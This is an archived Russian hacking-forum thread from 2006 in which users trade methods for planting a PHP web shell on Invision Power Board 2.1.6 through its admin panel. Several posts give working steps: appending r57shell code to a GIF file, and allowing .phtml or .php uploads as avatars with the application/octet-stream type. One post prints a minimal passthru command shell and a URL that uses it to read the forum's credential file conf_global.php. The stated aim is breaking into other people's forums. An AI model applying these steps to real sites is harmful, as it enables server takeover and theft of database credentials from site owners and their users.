Форум АНТИЧАТ - Cпособы залить шел в Invision через админку?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Cпособы залить шел в Invision через админку? (https://forum.antichat.xyz/showthread.php?t=20161)

nix	05.06.2006 07:15

Cпособы залить шел в Invision через админку?

Как залить шел имея пароль админа, от ИПБ 2.1.6, в смаилы неполчается там пропачено, какой еще способ... ?

GreenBear

05.06.2006 07:20

http://antichat.ru/txt/IPB/index2.php
http://forum.antichat.ru/thread11551.html

nix	05.06.2006 07:42

Странно вроде все сделал как сказанно http://forum.antichat.ru/thread11551.html в админке проверил чтобы можно было заливать аватары но почему то незаливаетя пишут обратись к админу... проверял на .гиф обычной картинки тож самое есть какие еще способы ?

SanyaX

05.06.2006 09:45

Я стал на заливку аватар расширение .php. нормально залилось :)

Brun	05.06.2006 14:37

Такой случай как у меня. Нельзя аватар добавить. Картинку залить. Вообще нечего нельзя. Админ поставил пармишн, что не удалять, не редактировати, не создавать нельзя! Как тут залить шел сам не знаю. Даже конфиг прочитать не смог. Хоть доступ к базе есть.

nix	06.06.2006 08:16

Цитата:

Сообщение от Brun

Во у меня примерно тож самое! че в этом случае делать ?

SK | Heaton

06.06.2006 14:16

nix, Если у тя есть доступ к админке все дела -)) В настройках форума есть разрешенные типы файлов для заливки + мак. лимит размера файлов. Измени подгони на смой шелл и все

Tem	06.06.2006 14:29

А другие тута о чём говорят, неполучается у человека, у меня тожа неполучалось но Мишка как всегда помог )))

nix	06.06.2006 22:11

Цитата:

Сообщение от SK | Heaton

Яж говорю что нельзя заливать аваторы и т.д и настройках делаю ниче не получается!

Sn@k3

08.06.2006 00:00

можно сделать так:
открываешь любую гифку в блокноте, далее открываешь наш всеми любимый r57shell от оманды r57, далее копируешь всё содержимое r57shell и вставляешь после всех символов в картинке(в блокноте). после сохраняешь под r57shella.php, всё. если будут вопросы сюда 4143389 или 298667422

JFKenedi

15.06.2006 11:53

Та же проблема.

Подобная проблема и у меня, Зливка смайлов запрещена, вообще запрещена.

Сделал расширение php разрешенным для Заливки и для использования в качестве аватара.
Через Mysql тоже не катит ! Аутфайл запрещен.

Что можно сделатЬ, шел залить очень нужно.

пароль От Админки ни чему не подходит...

JFKenedi

15.06.2006 13:14

Эврика !!

Нашел вот тему по этому поводу, Кстати на Античате.

Короче так.
Надо лишь поискать по форуму Античата =)

http://forum.antichat.ru/thread11551.html

Написать шелл...
Переименовать в cmd.phtml
На ломаемом форуме расзрешить загрузку файлов с расширением .phtml + разрешить использовать их как Аватары... + добавить строку application/octet-stream
в тип файла.
Проще даже отредактировать существующий тип.

Код:

Например:



.gif  

image/gif

Использовать ак аватар +



Делаем:



.php

application/octet-stream

Использовать ак аватар +

Загрузить как аватар любому пользователю файл с вашим шеллом
cmd.phtml
Содержания примерно:

Код:

<?

echo "<pre>";

passthru("$cmd");

echo "</pre>";

?>

и использовать:
__http://ww.site.ru/forums/uploads/avatar.phtml?cmd=cat ../conf_global.php

cc.melfox

16.06.2006 12:25

проблема с залитым шелом... залил по выше описаному способу шел всё вроде норм но при запуске шела он не запускается, а начинает грузится мне на комп :( расширение файла phtml...

qBiN	16.06.2006 15:26

просто не сообщил серверу что это пхп скрипт.
поиск рулит.

cc.melfox

16.06.2006 15:48

ээ а как сообщить? :)

banall

03.07.2006 07:35

Цитата:

Сообщение от cc.melfox

ээ а как сообщить? :)

Вот именно как?
Шелл заливается, но не работает, а выдает только исходник.

Время: 01:57